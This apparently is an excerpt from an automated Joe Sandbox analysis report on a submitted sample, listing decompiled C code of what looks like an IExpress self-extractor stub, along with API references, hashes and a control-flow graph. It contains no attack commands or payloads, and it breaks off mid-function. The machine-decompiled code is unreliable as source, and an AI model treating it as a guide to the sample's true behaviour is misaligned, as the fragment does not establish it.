                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0xa99124 = E00A96285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E00A944B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0xa99a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0xa99a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0xa99a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0xa99124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t66 = E00A9268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0xa99a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0xa99a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E00A944B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0xa99124 = E00A96285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E00A944B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xa99124 = E00A96285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E00A96CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95ae0
                                                                                                                                                                                                        0x00a95ae2
                                                                                                                                                                                                        0x00a95ae4
                                                                                                                                                                                                        0x00a95ae6
                                                                                                                                                                                                        0x00a95ae6
                                                                                                                                                                                                        0x00a95ae6
                                                                                                                                                                                                        0x00a95ae9
                                                                                                                                                                                                        0x00a95aeb
                                                                                                                                                                                                        0x00a95af0
                                                                                                                                                                                                        0x00a95af6
                                                                                                                                                                                                        0x00a95af8
                                                                                                                                                                                                        0x00a95af9
                                                                                                                                                                                                        0x00a95af9
                                                                                                                                                                                                        0x00a95afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95afd
                                                                                                                                                                                                        0x00a95aff
                                                                                                                                                                                                        0x00a95b00
                                                                                                                                                                                                        0x00a95b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b03
                                                                                                                                                                                                        0x00a95b05
                                                                                                                                                                                                        0x00a95b08
                                                                                                                                                                                                        0x00a95b20
                                                                                                                                                                                                        0x00a95b27
                                                                                                                                                                                                        0x00a95b52
                                                                                                                                                                                                        0x00a95b52
                                                                                                                                                                                                        0x00a95b5b
                                                                                                                                                                                                        0x00a95b62
                                                                                                                                                                                                        0x00a95b6b
                                                                                                                                                                                                        0x00a95b6d
                                                                                                                                                                                                        0x00a95b76
                                                                                                                                                                                                        0x00a95b7d
                                                                                                                                                                                                        0x00a95b83
                                                                                                                                                                                                        0x00a95b7f
                                                                                                                                                                                                        0x00a95b7f
                                                                                                                                                                                                        0x00a95b7f
                                                                                                                                                                                                        0x00a95b6f
                                                                                                                                                                                                        0x00a95b72
                                                                                                                                                                                                        0x00a95b72
                                                                                                                                                                                                        0x00a95b85
                                                                                                                                                                                                        0x00a95b98
                                                                                                                                                                                                        0x00a95b9e
                                                                                                                                                                                                        0x00a95b87
                                                                                                                                                                                                        0x00a95b8f
                                                                                                                                                                                                        0x00a95b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b85
                                                                                                                                                                                                        0x00a95b29
                                                                                                                                                                                                        0x00a95b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b35
                                                                                                                                                                                                        0x00a95b48
                                                                                                                                                                                                        0x00a95b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b4a
                                                                                                                                                                                                        0x00a95b0f
                                                                                                                                                                                                        0x00a95b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95b16
                                                                                                                                                                                                        0x00a95a7c
                                                                                                                                                                                                        0x00a95a8a
                                                                                                                                                                                                        0x00a95aa5
                                                                                                                                                                                                        0x00a95aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a959bb
                                                                                                                                                                                                        0x00a959c0
                                                                                                                                                                                                        0x00a959c7
                                                                                                                                                                                                        0x00a959d1
                                                                                                                                                                                                        0x00a959d6
                                                                                                                                                                                                        0x00a95c05
                                                                                                                                                                                                        0x00a95c14
                                                                                                                                                                                                        0x00a95c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A95A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00A95A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A95A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A95A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A95A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A95AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A95BFC
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: b11e817378ebe02390b720db536c2ce21954295fecb5a09bb8fbf75a3504b924
                                                                                                                                                                                                        • Instruction ID: cf13781c1ffcf952c122ec27dcd2d611bebea0298754f13fb84d4b0ed8fc9d06
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b11e817378ebe02390b720db536c2ce21954295fecb5a09bb8fbf75a3504b924
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C17171B1B00618AFEF16DB74CD86BFB77FCEB48340F5441AAF50596140EA349E868B64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 a94fe0-a9501a call a9468f FindResourceA LoadResource LockResource 377 a95161-a95163 374->377 378 a95020-a95027 374->378 379 a95029-a95051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 a95057-a9505e call a94efd 378->380 379->380 383 a9507c-a950b4 380->383 384 a95060-a95077 call a944b9 380->384 389 a950e8-a95104 call a944b9 383->389 390 a950b6-a950da 383->390 388 a95107-a9510e 384->388 392 a9511d-a9511f 388->392 393 a95110-a95117 FreeResource 388->393 398 a95106 389->398 390->398 402 a950dc 390->402 395 a9513a-a95141 392->395 396 a95121-a95127 392->396 393->392 400 a9515f 395->400 401 a95143-a9514a 395->401 396->395 399 a95129-a95135 call a944b9 396->399 398->388 399->395 400->377 401->400 404 a9514c-a95159 SendMessageA 401->404 405 a950e3-a950e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00A94FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0xa99144 = E00A9468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xa99140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xa98584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xa98584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E00A94EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E00A94CA0, E00A94CC0, E00A94980, E00A94A50, E00A94AD0, E00A94B60, E00A94BC0, 1, 0xa99148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xa99148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xa98584; // 0x0
                                                                                                                                                                                                        						E00A944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xa91140, 0, E00A94CD0, 0, 0xa99140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xa98584; // 0x0
                                                                                                                                                                                                        					E00A944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xa99140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xa99140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xa991d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E00A944B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xa98a38 & 0x00000001) == 0 && ( *0xa99a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xa98584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A94FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00A95006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00A9500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00A95030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A95037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00A9504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A95051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A95111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A95159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 0c0f0046fd7b892527b6491ea374b256950ee944b55dd7723262ed922cb99652
                                                                                                                                                                                                        • Instruction ID: 1e4a63e9f21d12e61d3883a5eef60a0892a6cc4067b0d032eec18e6b773eb9f2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c0f0046fd7b892527b6491ea374b256950ee944b55dd7723262ed922cb99652
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB3107B0B407017FEF209BB9AD8AF6736DCB708795F24061BB901A61A1DE788C038790
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph
                                                                                                                                                                                                        [Figure: control-flow graph of the function at a92f1d; legend: Executed / Not Executed]
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A92F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xa98a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E00A95164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E00A96CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E00A955A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E00A9658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0xa9a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0xa98a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0xa98a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0xa98d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0xa98d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0xa99a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E00A9256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0xa98a24; // 0x0
                                                                                                                                                                                                        									 *0xa99a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0xa98a38;
                                                                                                                                                                                                        										if( *0xa98a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E00A94169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0xa99a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E00A93BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0xa98a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E00A93B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E00A944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0xa99124 = E00A96285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0xa99a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00A9621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
